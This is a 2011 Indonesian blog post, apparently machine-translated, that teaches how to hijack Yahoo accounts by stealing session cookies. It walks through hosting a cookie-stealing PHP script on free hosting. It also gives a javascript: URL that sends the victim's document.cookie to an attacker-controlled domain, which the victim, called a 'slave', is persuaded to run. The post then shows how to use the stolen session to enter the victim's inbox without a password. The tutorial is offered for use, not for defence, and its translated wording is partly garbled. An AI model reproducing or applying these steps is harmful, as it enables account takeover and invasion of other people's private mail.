Senin, 06 Juni 2011

Hack Yahoo Account By Stealing Cookies (Session Hijacking)

HACK YAHOO ACCOUNT dengan mencuri COOKIES (pembajakan)
Pengarang: CR @ n SH Burn

Saya akan memberitahu Anda cara hack account yahoo oleh cookie mencuri atau kita dapat mengatakanmencuri ID sesi.

Pertama-tama saya ingin memberitahu anda dasar-dasar cookie.

Apa sesi cookie atau ID sesi?
Setiap kali kita masuk ke account itu menghasilkan sepotong tali yang unik. Satu salinan disimpan di serverdan lainnya di browser kita sebagai cookie. Keduanya cocok setiap kali kita melakukan sesuatu dalamaccount kita. Session cookies memungkinkan situs web yang Anda kunjungi untuk melacak perpindahanAnda dari halaman ke halaman sehingga Anda tidak mendapatkan meminta informasi yang sama Anda sudahdiberikan ke situs. Cookie memungkinkan Anda untuk melanjutkan melalui banyak halaman situs dengan cepat dan mudah tanpa harus mengotentikasi atau memproses ulang setiap daerah baru yang Anda kunjungi. Ini bagian dari sesi string atau login hancur ketika kita klik pada pilihan 'Sign Out'.


Cukup kunjungi yahoo.com. Ketik dalam browser

Code:
javascript:alert(document.cookie);

Anda akan mendapatkan kotak yang menampilkan pop up Anda cookie yang ditinggalkan oleh yahoo di PC kami.

[Image: pic.php?u=40452eP4TH&i=193551]
Sekarang login ke account Anda dan melakukan hal yang sama, Anda akan melihat beberapa elemen lebih ditambahkan ke cookie. Id ini merupakan sesi.

[Image: pic.php?u=40452eP4TH&i=193552]

Jadi itu berarti sesi disimpan di browser kita dalam bentuk cookie.

Seorang penyerang bisa mencuri sesi yang oleh budak meyakinkan untuk menjalankan potongan kode dalam browser. Penyerang dapat menggunakan sesi dicuri untuk login ke account slave tanpa harus memberikan username / password. Serangan ini sangat jarang karena ketika, sesi 'out Daftar' klik budak mendapat hancur dan penyerang terlalu juga mendapatkan sign out.

Namun dalam kasus yahoo, itu tidak sama. Penyerang tidak mendapatkan sign out ketika budak klik 'Sign out'. Meskipun sesi secara otomatis akan hancur setelah 24 jam oleh yahoo. Tapi ketika pengguna hanya menyegarkan jendela di account yahoo, dia mendapat sesi lagi untuk selanjutnya 24 jam. Ini berarti, setelah sesi akun yahoo dicuri, penyerang dapat mengakses account waktu hidup dengan jendela menyegarkan dalam setiap 24 jam. Saya tidak benar-benar yakin apakah 24 atau 48 nya jam.
Download the required script from here:

Langkah-langkah untuk mencuri cookie sesi:

1. Daftar untuk Account di setiap situs web hosting gratis.
Saya telah memilih my3gb.com.

2. Sekarang login ke account Anda dan pergi ke file manager.

[Image: pic.php?u=40452eP4TH&i=193553]

3. Sekarang upload empat file yang baru saja Anda download. Dan juga buat direktori baru bernama 'cookies' di sini.
[Image: pic.php?u=40452eP4TH&i=193556]

4. Sekarang memberikan kode ini kepada budak untuk menjalankan di browser ketika dia akan log in ke account yahoo nya.
Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Quote:
Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
Ketika budak menjalankan kode di browser, ia kembali akan redirect ke account yahoo nya.

5. Sekarang buka hacked.php tersebut.

Dan masukkan password (password default adalah CR @ 5H n BURN)

[Image: pic.php?u=40452eP4TH&i=193554]

Sekarang Anda harus telah mendapatkan username dari account slave. Cukup Klik dan akan membawa Anda ke kotak masuk account yahoo slave tanpa meminta password.
Sekarang tidak masalah jika budak tanda-tanda keluar dari account-nya, Anda akan tetap masuk ke dalamnya.

[Image: pic.php?u=40452eP4TH&i=193555]

Catatan: Anda dapat mencoba serangan ini dengan menggunakan dua browser. Sign in ke account yahoodalam satu browser dan menjalankan kode. Kemudian sign in melalui browser lain yang menggunakan sesidicuri.

Tidak ada komentar:

Posting Komentar